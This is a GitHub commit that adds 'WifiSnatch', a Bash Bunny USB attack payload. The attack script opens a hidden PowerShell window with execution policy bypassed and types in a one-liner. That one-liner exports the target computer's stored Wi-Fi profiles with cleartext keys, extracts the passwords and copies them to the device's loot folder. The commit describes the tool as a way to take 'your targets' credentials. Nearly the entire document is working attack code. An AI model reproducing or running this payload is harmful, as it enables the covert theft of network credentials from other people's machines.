Uploaded WifiSnatch

Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇
pull/468/head
0iphor13 2021-09-24 18:05:49 +02:00 committed by GitHub
parent 205e744f25
commit 4f46f9acfa
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 56 additions and 0 deletions

View File

@ -0,0 +1 @@
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;Start-Sleep 1;cd $env:TEMP;Start-Sleep 1;netsh wlan export profile key=clear;Start-Sleep 3;Select-String -Path WLAN*.xml -Pattern 'keyMaterial' > WLAN-PWD;Start-Sleep 3;mv WLAN-PWD ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');Start-Sleep 15;New-Item -ItemType file $bb"DONE";(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");

View File

@ -0,0 +1,55 @@
#!/bin/bash
#
# Title: WifiSnatch
# Description: Extract wifi information, such as passphrases & SSIDs
# Author: 0iphor13
# Version: 1.0
# Category: Exfiltration
# Attackmodes: HID, Storage
LED SETUP
GET SWITCH_POSITION
DUCKY_LANG de
rm /root/udisk/DONE
ATTACKMODE HID STORAGE
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
LED STAGE1
DELAY 5000
RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass"
DELAY 5000
Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\exfil.txt'))"
DELAY 10000
Q ENTER
DELAY 10000
Q CONTROL v
DELAY 10000
Q ENTER
DELAY 1000
LED STAGE2
until [ -f /root/udisk/DONE ]
do
sleep 0.2
done
LED CLEANUP
rm /root/udisk/DONE
DELAY 100
sync
DELAY 100
LED FINISH
#SAVE TO EJECT